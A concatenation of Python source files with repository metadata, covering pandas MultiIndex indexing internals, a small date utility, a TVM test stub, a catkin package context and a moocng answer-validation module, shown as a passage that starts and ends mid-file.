of the index; the 2nd part # needs linear search within the slice i = self._lexsort_depth lead_key, follow_key = key[:i], key[i:] if not lead_key: start = 0 stop = len(self) else: try: start, stop = self.slice_locs(lead_key, lead_key) except TypeError as err: # e.g. test_groupby_example key = ((0, 0, 1, 2), "new_col") # when self has 5 integer levels raise KeyError(key) from err if start == stop: raise KeyError(key) if not follow_key: return slice(start, stop) warnings.warn( "indexing past lexsort depth may impact performance.", PerformanceWarning, stacklevel=10, ) loc = np.arange(start, stop, dtype=np.intp) for i, k in enumerate(follow_key, len(lead_key)): mask = self.codes[i][loc] == self._get_loc_single_level_index( self.levels[i], k ) if not mask.all(): loc = loc[mask] if not len(loc): raise KeyError(key) return _maybe_to_slice(loc) if len(loc) != stop - start else slice(start, stop) def get_loc_level(self, key, level=0, drop_level: bool = True): """ Get location and sliced index for requested label(s)/level(s). Parameters ---------- key : label or sequence of labels level : int/level name or list thereof, optional drop_level : bool, default True If ``False``, the resulting index will not drop any level. Returns ------- loc : A 2-tuple where the elements are: Element 0: int, slice object or boolean array Element 1: The resulting sliced multiindex/index. If the key contains all levels, this will be ``None``. See Also -------- MultiIndex.get_loc : Get location for a label or a tuple of labels. MultiIndex.get_locs : Get location for a label/slice/list/mask or a sequence of such. Examples -------- >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')], ... names=['A', 'B']) >>> mi.get_loc_level('b') (slice(1, 3, None), Index(['e', 'f'], dtype='object', name='B')) >>> mi.get_loc_level('e', level='B') (array([False, True, False]), Index(['b'], dtype='object', name='A')) >>> mi.get_loc_level(['b', 'e']) (1, None) """ if not isinstance(level, (list, tuple)): level = self._get_level_number(level) else: level = [self._get_level_number(lev) for lev in level] loc, mi = self._get_loc_level(key, level=level) if not drop_level: if lib.is_integer(loc): mi = self[loc : loc + 1] else: mi = self[loc] return loc, mi def _get_loc_level(self, key, level: int | list[int] = 0): """ get_loc_level but with `level` known to be positional, not name-based. """ # different name to distinguish from maybe_droplevels def maybe_mi_droplevels(indexer, levels): new_index = self[indexer] for i in sorted(levels, reverse=True): new_index = new_index._drop_level_numbers([i]) return new_index if isinstance(level, (tuple, list)): if len(key) != len(level): raise AssertionError( "Key for location must have same length as number of levels" ) result = None for lev, k in zip(level, key): loc, new_index = self._get_loc_level(k, level=lev) if isinstance(loc, slice): mask = np.zeros(len(self), dtype=bool) mask[loc] = True loc = mask result = loc if result is None else result & loc try: # FIXME: we should be only dropping levels on which we are # scalar-indexing mi = maybe_mi_droplevels(result, level) except ValueError: # droplevel failed because we tried to drop all levels, # i.e. len(level) == self.nlevels mi = self[result] return result, mi # kludge for #1796 if isinstance(key, list): key = tuple(key) if isinstance(key, tuple) and level == 0: try: # Check if this tuple is a single key in our first level if key in self.levels[0]: indexer = self._get_level_indexer(key, level=level) new_index = maybe_mi_droplevels(indexer, [0]) return indexer, new_index except (TypeError, InvalidIndexError): pass if not any(isinstance(k, slice) for k in key): if len(key) == self.nlevels and self.is_unique: # Complete key in unique index -> standard get_loc try: return (self._engine.get_loc(key), None) except KeyError as err: raise KeyError(key) from err except TypeError: # e.g. partial string indexing # test_partial_string_timestamp_multiindex pass # partial selection indexer = self.get_loc(key) ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)] if len(ilevels) == self.nlevels: if is_integer(indexer): # we are dropping all levels return indexer, None # TODO: in some cases we still need to drop some levels, # e.g. test_multiindex_perf_warn # test_partial_string_timestamp_multiindex ilevels = [ i for i in range(len(key)) if ( not isinstance(key[i], str) or not self.levels[i]._supports_partial_string_indexing ) and key[i] != slice(None, None) ] if len(ilevels) == self.nlevels: # TODO: why? ilevels = [] return indexer, maybe_mi_droplevels(indexer, ilevels) else: indexer = None for i, k in enumerate(key): if not isinstance(k, slice): loc_level = self._get_level_indexer(k, level=i) if isinstance(loc_level, slice): if com.is_null_slice(loc_level) or com.is_full_slice( loc_level, len(self) ): # everything continue else: # e.g. test_xs_IndexSlice_argument_not_implemented k_index = np.zeros(len(self), dtype=bool) k_index[loc_level] = True else: k_index = loc_level elif com.is_null_slice(k): # taking everything, does not affect `indexer` below continue else: # FIXME: this message can be inaccurate, e.g. # test_series_varied_multiindex_alignment raise TypeError(f"Expected label or tuple of labels, got {key}") if indexer is None: indexer = k_index else: indexer &= k_index if indexer is None: indexer = slice(None, None) ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)] return indexer, maybe_mi_droplevels(indexer, ilevels) else: indexer = self._get_level_indexer(key, level=level) if ( isinstance(key, str) and self.levels[level]._supports_partial_string_indexing ): # check to see if we did an exact lookup vs sliced check = self.levels[level].get_loc(key) if not is_integer(check): # e.g. test_partial_string_timestamp_multiindex return indexer, self[indexer] return indexer, maybe_mi_droplevels(indexer, [level]) def _get_level_indexer( self, key, level: int = 0, indexer: Int64Index | None = None ): # `level` kwarg is _always_ positional, never name # return an indexer, boolean array or a slice showing where the key is # in the totality of values # if the indexer is provided, then use this level_index = self.levels[level] level_codes = self.codes[level] def convert_indexer(start, stop, step, indexer=indexer, codes=level_codes): # given the inputs and the codes/indexer, compute an indexer set # if we have a provided indexer, then this need not consider # the entire labels set if step is not None and step < 0: # Switch elements for negative step size start, stop = stop - 1, start - 1 r = np.arange(start, stop, step) if indexer is not None and len(indexer) != len(codes): # we have an indexer which maps the locations in the labels # that we have already selected (and is not an indexer for the # entire set) otherwise this is wasteful so we only need to # examine locations that are in this set the only magic here is # that the result are the mappings to the set that we have # selected from pandas import Series mapper = Series(indexer) indexer = codes.take(ensure_platform_int(indexer)) result = Series(Index(indexer).isin(r).nonzero()[0]) m = result.map(mapper) # error: Incompatible types in assignment (expression has type # "ndarray", variable has type "Series") m = np.asarray(m) # type: ignore[assignment] else: # error: Incompatible types in assignment (expression has type # "ndarray", variable has type "Series") m = np.zeros(len(codes), dtype=bool) # type: ignore[assignment] m[np.in1d(codes, r, assume_unique=Index(codes).is_unique)] = True return m if isinstance(key, slice): # handle a slice, returning a slice if we can # otherwise a boolean indexer try: if key.start is not None: start = level_index.get_loc(key.start) else: start = 0 if key.stop is not None: stop = level_index.get_loc(key.stop) elif isinstance(start, slice): stop = len(level_index) else: stop = len(level_index) - 1 step = key.step except KeyError: # we have a partial slice (like looking up a partial date # string) start = stop = level_index.slice_indexer(key.start, key.stop, key.step) step = start.step if isinstance(start, slice) or isinstance(stop, slice): # we have a slice for start and/or stop # a partial date slicer on a DatetimeIndex generates a slice # note that the stop ALREADY includes the stopped point (if # it was a string sliced) start = getattr(start, "start", start) stop = getattr(stop, "stop", stop) return convert_indexer(start, stop, step) elif level > 0 or self._lexsort_depth == 0 or step is not None: # need to have like semantics here to right # searching as when we are using a slice # so include the stop+1 (so we include stop) return convert_indexer(start, stop + 1, step) else: # sorted, so can return slice object -> view i = level_codes.searchsorted(start, side="left") j = level_codes.searchsorted(stop, side="right") return slice(i, j, step) else: idx = self._get_loc_single_level_index(level_index, key) if level > 0 or self._lexsort_depth == 0: # Desired level is not sorted if isinstance(idx, slice): # test_get_loc_partial_timestamp_multiindex locs = (level_codes >= idx.start) & (level_codes < idx.stop) return locs locs = np.array(level_codes == idx, dtype=bool, copy=False) if not locs.any(): # The label is present in self.levels[level] but unused: raise KeyError(key) return locs if isinstance(idx, slice): # e.g. test_partial_string_timestamp_multiindex start = level_codes.searchsorted(idx.start, side="left") # NB: "left" here bc of slice semantics end = level_codes.searchsorted(idx.stop, side="left") else: start = level_codes.searchsorted(idx, side="left") end = level_codes.searchsorted(idx, side="right") if start == end: # The label is present in self.levels[level] but unused: raise KeyError(key) return slice(start, end) def get_locs(self, seq): """ Get location for a sequence of labels. Parameters ---------- seq : label, slice, list, mask or a sequence of such You should use one of the above for each level. If a level should not be used, set it to ``slice(None)``. Returns ------- numpy.ndarray NumPy array of integers suitable for passing to iloc. See Also -------- MultiIndex.get_loc : Get location for a label or a tuple of labels. MultiIndex.slice_locs : Get slice location given start label(s) and end label(s). Examples -------- >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')]) >>> mi.get_locs('b') # doctest: +SKIP array([1, 2], dtype=int64) >>> mi.get_locs([slice(None), ['e', 'f']]) # doctest: +SKIP array([1, 2], dtype=int64) >>> mi.get_locs([[True, False, True], slice('e', 'f')]) # doctest: +SKIP array([2], dtype=int64) """ # must be lexsorted to at least as many levels true_slices = [i for (i, s) in enumerate(com.is_true_slices(seq)) if s] if true_slices and true_slices[-1] >= self._lexsort_depth: raise UnsortedIndexError( "MultiIndex slicing requires the index to be lexsorted: slicing " f"on levels {true_slices}, lexsort depth {self._lexsort_depth}" ) n = len(self) # indexer is the list of all positions that we want to take; we # start with it being everything and narrow it down as we look at each # entry in `seq` indexer = Index(np.arange(n)) def _convert_to_indexer(r) -> Int64Index: # return an indexer if isinstance(r, slice): m = np.zeros(n, dtype=bool) m[r] = True r = m.nonzero()[0] elif com.is_bool_indexer(r): if len(r) != n: raise ValueError( "cannot index with a boolean indexer " "that is not the same length as the " "index" ) r = r.nonzero()[0] return Int64Index(r) def _update_indexer(idxr: Index, indexer: Index) -> Index: indexer_intersection = indexer.intersection(idxr) if indexer_intersection.empty and not idxr.empty and not indexer.empty: raise KeyError(seq) return indexer_intersection for i, k in enumerate(seq): if com.is_bool_indexer(k): # a boolean indexer, must be the same length! k = np.asarray(k) lvl_indexer = _convert_to_indexer(k) indexer = _update_indexer(lvl_indexer, indexer=indexer) elif is_list_like(k): # a collection of labels to include from this level (these # are or'd) indexers: Int64Index | None = None # GH#27591 check if this is a single tuple key in the level try: # Argument "indexer" to "_get_level_indexer" of "MultiIndex" # has incompatible type "Index"; expected "Optional[Int64Index]" lev_loc = self._get_level_indexer( k, level=i, indexer=indexer # type: ignore[arg-type] ) except (InvalidIndexError, TypeError, KeyError) as err: # InvalidIndexError e.g. non-hashable, fall back to treating # this as a sequence of labels # KeyError it can be ambiguous if this is a label or sequence # of labels # github.com/pandas-dev/pandas/issues/39424#issuecomment-871626708 for x in k: if not is_hashable(x): # e.g. slice raise err try: # Argument "indexer" to "_get_level_indexer" of "MultiIndex" # has incompatible type "Index"; expected # "Optional[Int64Index]" item_lvl_indexer = self._get_level_indexer( x, level=i, indexer=indexer # type: ignore[arg-type] ) except KeyError: # ignore not founds; see discussion in GH#39424 warnings.warn( "The behavior of indexing on a MultiIndex with a " "nested sequence of labels is deprecated and will " "change in a future version. " "`series.loc[label, sequence]` will raise if any " "members of 'sequence' or not present in " "the index's second level. To retain the old " "behavior, use `series.index.isin(sequence, level=1)`", # TODO: how to opt in to the future behavior? # TODO: how to handle IntervalIndex level? # (no test cases) FutureWarning, stacklevel=7, ) continue else: idxrs = _convert_to_indexer(item_lvl_indexer) if indexers is None: indexers = idxrs else: indexers = indexers.union(idxrs, sort=False) else: idxrs = _convert_to_indexer(lev_loc) if indexers is None: indexers = idxrs else: indexers = indexers.union(idxrs, sort=False) if indexers is not None: indexer = _update_indexer(indexers, indexer=indexer) else: # no matches we are done # test_loc_getitem_duplicates_multiindex_empty_indexer return np.array([], dtype=np.intp) elif com.is_null_slice(k): # empty slice pass elif isinstance(k, slice): # a slice, include BOTH of the labels # Argument "indexer" to "_get_level_indexer" of "MultiIndex" has # incompatible type "Index"; expected "Optional[Int64Index]" lvl_indexer = self._get_level_indexer( k, level=i, indexer=indexer, # type: ignore[arg-type] ) indexer = _update_indexer( _convert_to_indexer(lvl_indexer), indexer=indexer, ) else: # a single label lvl_indexer = self._get_loc_level(k, level=i)[0] indexer = _update_indexer( _convert_to_indexer(lvl_indexer), indexer=indexer, ) # empty indexer if indexer is None: return np.array([], dtype=np.intp) assert isinstance(indexer, Int64Index), type(indexer) indexer = self._reorder_indexer(seq, indexer) return indexer._values.astype(np.intp, copy=False) # -------------------------------------------------------------------- def _reorder_indexer( self, seq: tuple[Scalar | Iterable | AnyArrayLike, ...], indexer: Int64Index, ) -> Int64Index: """ Reorder an indexer of a MultiIndex (self) so that the label are in the same order as given in seq Parameters ---------- seq : label/slice/list/mask or a sequence of such indexer: an Int64Index indexer of self Returns ------- indexer : a sorted Int64Index indexer of self ordered as seq """ # If the index is lexsorted and the list_like label in seq are sorted # then we do not need to sort if self._is_lexsorted(): need_sort = False for i, k in enumerate(seq): if is_list_like(k): if not need_sort: k_codes = self.levels[i].get_indexer(k) k_codes = k_codes[k_codes >= 0] # Filter absent keys # True if the given codes are not ordered need_sort = (k_codes[:-1] > k_codes[1:]).any() elif isinstance(k, slice) and k.step is not None and k.step < 0: need_sort = True # Bail out if both index and seq are sorted if not need_sort: return indexer n = len(self) keys: tuple[np.ndarray, ...] = () # For each level of the sequence in seq, map the level codes with the # order they appears in a list-like sequence # This mapping is then use to reorder the indexer for i, k in enumerate(seq): if is_scalar(k): # GH#34603 we want to treat a scalar the same as an all equal list k = [k] if com.is_bool_indexer(k): new_order = np.arange(n)[indexer] elif is_list_like(k): # Generate a map with all level codes as sorted initially k = algos.unique(k) key_order_map = np.ones(len(self.levels[i]), dtype=np.uint64) * len( self.levels[i] ) # Set order as given in the indexer list level_indexer = self.levels[i].get_indexer(k) level_indexer = level_indexer[level_indexer >= 0] # Filter absent keys key_order_map[level_indexer] = np.arange(len(level_indexer)) new_order = key_order_map[self.codes[i][indexer]] elif isinstance(k, slice) and k.step is not None and k.step < 0: new_order = np.arange(n)[k][indexer] elif isinstance(k, slice) and k.start is None and k.stop is None: # slice(None) should not determine order GH#31330 new_order = np.ones((n,))[indexer] else: # For all other case, use the same order as the level new_order = np.arange(n)[indexer] keys = (new_order,) + keys # Find the reordering using lexsort on the keys mapping ind = np.lexsort(keys) return indexer[ind] def truncate(self, before=None, after=None) -> MultiIndex: """ Slice index between two labels / tuples, return new MultiIndex Parameters ---------- before : label or tuple, can be partial. Default None None defaults to start after : label or tuple, can be partial. Default None None defaults to end Returns ------- truncated : MultiIndex """ if after and before and after < before: raise ValueError("after < before") i, j = self.levels[0].slice_locs(before, after) left, right = self.slice_locs(before, after) new_levels = list(self.levels) new_levels[0] = new_levels[0][i:j] new_codes = [level_codes[left:right] for level_codes in self.codes] new_codes[0] = new_codes[0] - i return MultiIndex( levels=new_levels, codes=new_codes, names=self._names, verify_integrity=False, ) def equals(self, other: object) -> bool: """ Determines if two MultiIndex objects have the same labeling information (the levels themselves do not necessarily have to be the same) See Also -------- equal_levels """ if self.is_(other): return True if not isinstance(other, Index): return False if len(self) != len(other): return False if not isinstance(other, MultiIndex): # d-level MultiIndex can equal d-tuple Index if not self._should_compare(other): # object Index or Categorical[object] may contain tuples return False return array_equivalent(self._values, other._values) if self.nlevels != other.nlevels: return False for i in range(self.nlevels): self_codes = self.codes[i] other_codes = other.codes[i] self_mask = self_codes == -1 other_mask = other_codes == -1 if not np.array_equal(self_mask, other_mask): return False self_codes = self_codes[~self_mask] self_values = self.levels[i]._values.take(self_codes) other_codes = other_codes[~other_mask] other_values = other.levels[i]._values.take(other_codes) # since we use NaT both datetime64 and timedelta64 we can have a # situation where a level is typed say timedelta64 in self (IOW it # has other values than NaT) but types datetime64 in other (where # its all NaT) but these are equivalent if len(self_values) == 0 and len(other_values) == 0: continue if not array_equivalent(self_values, other_values): return False return True def equal_levels(self, other: MultiIndex) -> bool: """ Return True if the levels of both MultiIndex objects are the same """ if self.nlevels != other.nlevels: return False for i in range(self.nlevels): if not self.levels[i].equals(other.levels[i]): return False return True # -------------------------------------------------------------------- # Set Methods def _union(self, other, sort) -> MultiIndex: other, result_names = self._convert_can_do_setop(other) if ( any(-1 in code for code in self.codes) and any(-1 in code for code in other.codes) or self.has_duplicates or other.has_duplicates ): # This is only necessary if both sides have nans or one has dups, # fast_unique_multiple is faster result = super()._union(other, sort) else: rvals = other._values.astype(object, copy=False) result = lib.fast_unique_multiple([self._values, rvals], sort=sort) return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names) def _is_comparable_dtype(self, dtype: DtypeObj) -> bool: return is_object_dtype(dtype) def _get_reconciled_name_object(self, other) -> MultiIndex: """ If the result of a set operation will be self, return self, unless the names change, in which case make a shallow copy of self. """ names = self._maybe_match_names(other) if self.names != names: # Incompatible return value type (got "Optional[MultiIndex]", expected # "MultiIndex") return self.rename(names) # type: ignore[return-value] return self def _maybe_match_names(self, other): """ Try to find common names to attach to the result of an operation between a and b. Return a consensus list of names if they match at least partly or list of None if they have completely different names. """ if len(self.names) != len(other.names): return [None] * len(self.names) names = [] for a_name, b_name in zip(self.names, other.names): if a_name == b_name: names.append(a_name) else: # TODO: what if they both have np.nan for their names? names.append(None) return names def _wrap_intersection_result(self, other, result) -> MultiIndex: _, result_names = self._convert_can_do_setop(other) if len(result) == 0: return MultiIndex( levels=self.levels, codes=[[]] * self.nlevels, names=result_names, verify_integrity=False, ) else: return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names) def _wrap_difference_result(self, other, result) -> MultiIndex: _, result_names = self._convert_can_do_setop(other) if len(result) == 0: return MultiIndex( levels=[[]] * self.nlevels, codes=[[]] * self.nlevels, names=result_names, verify_integrity=False, ) else: return MultiIndex.from_tuples(result, sortorder=0, names=result_names) def _convert_can_do_setop(self, other): result_names = self.names if not isinstance(other, Index): if len(other) == 0: return self[:0], self.names else: msg = "other must be a MultiIndex or a list of tuples" try: other = MultiIndex.from_tuples(other, names=self.names) except (ValueError, TypeError) as err: # ValueError raised by tuples_to_object_array if we # have non-object dtype raise TypeError(msg) from err else: result_names = get_unanimous_names(self, other) return other, result_names # -------------------------------------------------------------------- @doc(Index.astype) def astype(self, dtype, copy: bool = True): dtype = pandas_dtype(dtype) if is_categorical_dtype(dtype): msg = "> 1 ndim Categorical are not supported at this time" raise NotImplementedError(msg) elif not is_object_dtype(dtype): raise TypeError( "Setting a MultiIndex dtype to anything other than object " "is not supported" ) elif copy is True: return self._view() return self def _validate_fill_value(self, item): if isinstance(item, MultiIndex): # GH#43212 if item.nlevels != self.nlevels: raise ValueError("Item must have length equal to number of levels.") return item._values elif not isinstance(item, tuple): # Pad the key with empty strings if lower levels of the key # aren't specified: item = (item,) + ("",) * (self.nlevels - 1) elif len(item) != self.nlevels: raise ValueError("Item must have length equal to number of levels.") return item def insert(self, loc: int, item) -> MultiIndex: """ Make new MultiIndex inserting new item at location Parameters ---------- loc : int item : tuple Must be same length as number of levels in the MultiIndex Returns ------- new_index : Index """ item = self._validate_fill_value(item) new_levels = [] new_codes = [] for k, level, level_codes in zip(item, self.levels, self.codes): if k not in level: # have to insert into level # must insert at end otherwise you have to recompute all the # other codes lev_loc = len(level) level = level.insert(lev_loc, k) else: lev_loc = level.get_loc(k) new_levels.append(level) new_codes.append(np.insert(ensure_int64(level_codes), loc, lev_loc)) return MultiIndex( levels=new_levels, codes=new_codes, names=self.names, verify_integrity=False ) def delete(self, loc) -> MultiIndex: """ Make new index with passed location deleted Returns ------- new_index : MultiIndex """ new_codes = [np.delete(level_codes, loc) for level_codes in self.codes] return MultiIndex( levels=self.levels, codes=new_codes, names=self.names, verify_integrity=False, ) @doc(Index.isin) def isin(self, values, level=None) -> npt.NDArray[np.bool_]: if level is None: values = MultiIndex.from_tuples(values, names=self.names)._values return algos.isin(self._values, values) else: num = self._get_level_number(level) levs = self.get_level_values(num) if levs.size == 0: return np.zeros(len(levs), dtype=np.bool_) return levs.isin(values) @deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "names"]) def set_names(self, names, level=None, inplace: bool = False) -> MultiIndex | None: return super().set_names(names=names, level=level, inplace=inplace) rename = set_names @deprecate_nonkeyword_arguments(version=None, allowed_args=["self"]) def drop_duplicates(self, keep: str | bool = "first") -> MultiIndex: return super().drop_duplicates(keep=keep) # --------------------------------------------------------------- # Arithmetic/Numeric Methods - Disabled __add__ = make_invalid_op("__add__") __radd__ = make_invalid_op("__radd__") __iadd__ = make_invalid_op("__iadd__") __sub__ = make_invalid_op("__sub__") __rsub__ = make_invalid_op("__rsub__") __isub__ = make_invalid_op("__isub__") __pow__ = make_invalid_op("__pow__") __rpow__ = make_invalid_op("__rpow__") __mul__ = make_invalid_op("__mul__") __rmul__ = make_invalid_op("__rmul__") __floordiv__ = make_invalid_op("__floordiv__") __rfloordiv__ = make_invalid_op("__rfloordiv__") __truediv__ = make_invalid_op("__truediv__") __rtruediv__ = make_invalid_op("__rtruediv__") __mod__ = make_invalid_op("__mod__") __rmod__ = make_invalid_op("__rmod__") __divmod__ = make_invalid_op("__divmod__") __rdivmod__ = make_invalid_op("__rdivmod__") # Unary methods disabled __neg__ = make_invalid_op("__neg__") __pos__ = make_invalid_op("__pos__") __abs__ = make_invalid_op("__abs__") __inv__ = make_invalid_op("__inv__") def _lexsort_depth(codes: list[np.ndarray], nlevels: int) -> int: """Count depth (up to a maximum of `nlevels`) with which codes are lexsorted.""" int64_codes = [ensure_int64(level_codes) for level_codes in codes] for k in range(nlevels, 0, -1): if libalgos.is_lexsorted(int64_codes[:k]): return k return 0 def sparsify_labels(label_list, start: int = 0, sentinel=""): pivoted = list(zip(*label_list)) k = len(label_list) result = pivoted[: start + 1] prev = pivoted[start] for cur in pivoted[start + 1 :]: sparse_cur = [] for i, (p, t) in enumerate(zip(prev, cur)): if i == k - 1: sparse_cur.append(t) result.append(sparse_cur) break if p == t: sparse_cur.append(sentinel) else: sparse_cur.extend(cur[i:]) result.append(sparse_cur) break prev = cur return list(zip(*result)) def _get_na_rep(dtype) -> str: return {np.datetime64: "NaT", np.timedelta64: "NaT"}.get(dtype, "NaN") def maybe_droplevels(index: Index, key) -> Index: """ Attempt to drop level or levels from the given index. Parameters ---------- index: Index key : scalar or tuple Returns ------- Index """ # drop levels original_index = index if isinstance(key, tuple): for _ in key: try: index = index._drop_level_numbers([0]) except ValueError: # we have dropped too much, so back out return original_index else: try: index = index._drop_level_numbers([0]) except ValueError: pass return index def _coerce_indexer_frozen(array_like, categories, copy: bool = False) -> np.ndarray: """ Coerce the array-like indexer to the smallest integer dtype that can encode all of the given categories. Parameters ---------- array_like : array-like categories : array-like copy : bool Returns ------- np.ndarray Non-writeable. """ array_like = coerce_indexer_dtype(array_like, categories) if copy: array_like = array_like.copy() array_like.flags.writeable = False return array_like def _require_listlike(level, arr, arrname: str): """ Ensure that level is either None or listlike, and arr is list-of-listlike. """ if level is not None and not is_list_like(level): if not is_list_like(arr): raise TypeError(f"{arrname} must be list-like") if is_list_like(arr[0]): raise TypeError(f"{arrname} must be list-like") level = [level] arr = [arr] elif level is None or is_list_like(level): if not is_list_like(arr) or not is_list_like(arr[0]): raise TypeError(f"{arrname} must be list of lists-like") return level, arr
34.359755
88
0.533148
a483ede61a9cc7a58b855d8bc24488c21b9c7142
194
py
Python
tomaty/lib/utilities/date_utilities.py
nucle0tides/tomaty
45eb0475f9e9635a6aa2fe41606e4d2fb6403101
[ "MIT" ]
5
2018-03-29T16:27:36.000Z
2020-06-14T15:19:19.000Z
tomaty/lib/utilities/date_utilities.py
nucle0tides/tomaty
45eb0475f9e9635a6aa2fe41606e4d2fb6403101
[ "MIT" ]
29
2018-03-29T16:29:43.000Z
2018-04-24T02:03:13.000Z
tomaty/lib/utilities/date_utilities.py
nucle0tides/tomaty
45eb0475f9e9635a6aa2fe41606e4d2fb6403101
[ "MIT" ]
2
2018-03-29T16:27:39.000Z
2018-03-29T20:42:03.000Z
from datetime import timedelta, datetime def string_to_timedelta(datestr): t = datetime.strptime(datestr, '%H:%M:%S') return timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
32.333333
70
0.742268
b1de9ec75221cc1a4a1a4719d1bdec58a6cc349b
917
py
Python
tests/python/contrib/test_hexagon/test_relax_integration.py
octoml/relax
41f14415ba28d62e155b75ea2c740b25213a9970
[ "Apache-2.0" ]
11
2021-11-02T00:49:16.000Z
2021-11-19T02:17:00.000Z
tests/python/contrib/test_hexagon/test_relax_integration.py
octoml/relax
41f14415ba28d62e155b75ea2c740b25213a9970
[ "Apache-2.0" ]
16
2021-11-02T00:17:12.000Z
2021-11-21T20:47:52.000Z
tests/python/contrib/test_hexagon/test_relax_integration.py
octoml/relax
41f14415ba28d62e155b75ea2c740b25213a9970
[ "Apache-2.0" ]
4
2021-11-05T18:17:23.000Z
2021-11-11T06:22:00.000Z
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import tvm.testing @tvm.testing.requires_hexagon def test_simple(): pass if __name__ == "__main__": tvm.testing.main()
32.75
62
0.762268
2249eabccebce6f55538df48e6f4d43054666f25
580
py
Python
build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py
odinase/roswiimote
b3a9b4c18a1598f8cf4399e038d1cddd06954063
[ "MIT" ]
null
null
null
build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py
odinase/roswiimote
b3a9b4c18a1598f8cf4399e038d1cddd06954063
[ "MIT" ]
null
null
null
build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py
odinase/roswiimote
b3a9b4c18a1598f8cf4399e038d1cddd06954063
[ "MIT" ]
null
null
null
# generated from catkin/cmake/template/pkg.context.pc.in CATKIN_PACKAGE_PREFIX = "" PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include".split(';') if "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include" != "" else [] PROJECT_CATKIN_DEPENDS = "message_runtime;roscpp;std_msgs;sensor_msgs".replace(';', ' ') PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else [] PROJECT_NAME = "wiimote_state_estimation" PROJECT_SPACE_DIR = "/home/odin/ros_testing/roswiimote/devel" PROJECT_VERSION = "0.0.0"
64.444444
207
0.77931
588a39493e74947f33f29aab4a6a3325dd634be6
4,572
py
Python
moocng/api/validation.py
OpenMOOC/moocng
1e3dafb84aa1838c881df0c9bcca069e47c7f52d
[ "Apache-2.0" ]
36
2015-01-10T06:00:36.000Z
2020-03-19T10:06:59.000Z
moocng/api/validation.py
OpenMOOC/moocng
1e3dafb84aa1838c881df0c9bcca069e47c7f52d
[ "Apache-2.0" ]
3
2015-10-01T17:59:32.000Z
2018-09-04T03:32:17.000Z
moocng/api/validation.py
OpenMOOC/moocng
1e3dafb84aa1838c881df0c9bcca069e47c7f52d
[ "Apache-2.0" ]
17
2015-01-13T03:46:58.000Z
2020-07-05T06:29:51.000Z
# -*- coding: utf-8 -*- # Copyright 2012-2013 UNED # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cgi import escape from datetime import datetime import logging from django.conf import settings from django.core.exceptions import ValidationError from tastypie.validation import Validation from moocng.courses.models import Question, Option from moocng.mongodb import get_db logger = logging.getLogger(__name__) def answer_validate_date(bundle, request=None): question_id = bundle.data.get("question_id", None) if question_id is None: raise ValidationError("question_id is required") question = Question.objects.get(id=question_id) unit = question.kq.unit if (unit.unittype != 'n' and unit.deadline and datetime.now(unit.deadline.tzinfo) > unit.deadline): raise ValidationError("Unit's deadline is exceed") return {} class AnswerValidation(Validation): def _gen_message(self, username, reply, should_be): return 'Reply from user %s for option %s is should be %s but is %s' % ( username, reply['option'], should_be, escape(unicode(type(reply['value'])))) def is_valid(self, bundle, request=None): errors = {} errors.update(self.validate_date(bundle, request)) errors.update(self.validate_replyList(bundle, request)) return errors def validate_date(self, bundle, request=None): return answer_validate_date(bundle, request) def validate_replyList(self, bundle, request=None): questionID = bundle.data.get("question_id", None) replyList = bundle.data.get("replyList", None) if (replyList is None or not isinstance(replyList, list) or len(replyList) == 0): msg = "replyList is empty or isn't a list" logger.error(msg) raise ValidationError(msg) if (questionID is not None) and (len(bundle.data['replyList']) > 0): try: question = Question.objects.get(id=questionID) for reply in bundle.data['replyList']: option = question.option_set.get(id=reply['option']) msg = None if (option.optiontype == 't') and (not isinstance(reply['value'], basestring)): msg = self._gen_message(request.user.username, reply, 'text') elif (option.optiontype in ['c', 'r']) and (not isinstance(reply['value'], bool)): msg = self._gen_message(request.user.username, reply, 'boolean') if msg is not None: logger.error(msg) raise ValidationError(msg) except Question.DoesNotExist: msg = 'Question %s does not exist' % questionID logger.error(msg) raise ValidationError(msg) except Option.DoesNotExist: msg = 'Option %s does not exist' % reply['option'] logger.error(msg) raise ValidationError(msg) return {} class PeerReviewSubmissionsResourceValidation(Validation): def is_valid(self, bundle, request): if not bundle.data or not ("kq" in bundle.data): return {'__all__': 'Expected kq id'} errors = {} db = get_db() collection = db.get_collection("peer_review_submissions") exists = collection.find({ "kq": bundle.data["kq"], "author": unicode(request.user.id) }) if exists.count() > 0: msg = "Already exists a submission for kq=%s and user=%s" % ( bundle.data["kq"], request.user.id) logger.error(msg) errors["kq"] = [msg] errors["author"] = [msg] text = bundle.data.get("text", "") max_text_leng = getattr(settings, "PEER_REVIEW_TEXT_MAX_SIZE", 5000) if len(text) > max_text_leng: errors["text"] = "Text is longer than %s chars" % max_text_leng return errors
35.44186
102
0.617892
bcc3b7039c50d47b9d7189eb36868a920c150ea4
20,305
py
Python
active_subspaces/domains.py
carlosal1015/active_subspaces
caaf108fcb89548a374fea7704b0d92d38b4539a
[ "MIT" ]
1
2020-03-16T18:05:05.000Z
